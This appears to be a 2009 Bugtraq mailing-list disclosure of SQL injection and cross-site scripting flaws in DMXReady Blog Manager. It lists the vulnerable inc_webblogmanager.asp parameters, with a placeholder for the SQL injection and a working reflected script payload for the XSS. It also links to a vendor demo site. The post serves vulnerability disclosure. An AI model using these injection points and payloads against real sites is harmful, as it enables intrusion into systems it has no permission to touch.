Bugtraq mailing list archives
DMXReady Blog Manager (SQL/XSS)
From: pouya.s3rver () gmail com
Date: Fri, 16 Jan 2009 02:33:38 -0700
######################################################### --------------------------------------------------------- Portal Name: DMXReady Blog Manager (SQL/XSS) Vendor : http://www.galaxyscripts.com Author : Pouya_Server , Pouya.s3rver () Gmail com Aria-Security.Net Vulnerability : (SQL/XSS) --------------------------------------------------------- ######################################################### [SQL]: http://www.site.com/[Path]/inc_webblogmanager.asp?CategoryID=121&ItemID=[SQL]&action=view ---------- [XSS]: http://www.site.com/[Path]/inc_webblogmanager.asp?CategoryID=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&ItemID=1&action=refer --------------------------------- Demo: http://www.demo.dmxready.com/applications/WebBlogManager/
Current thread:
- DMXReady Blog Manager (SQL/XSS) pouya . s3rver (Jan 16)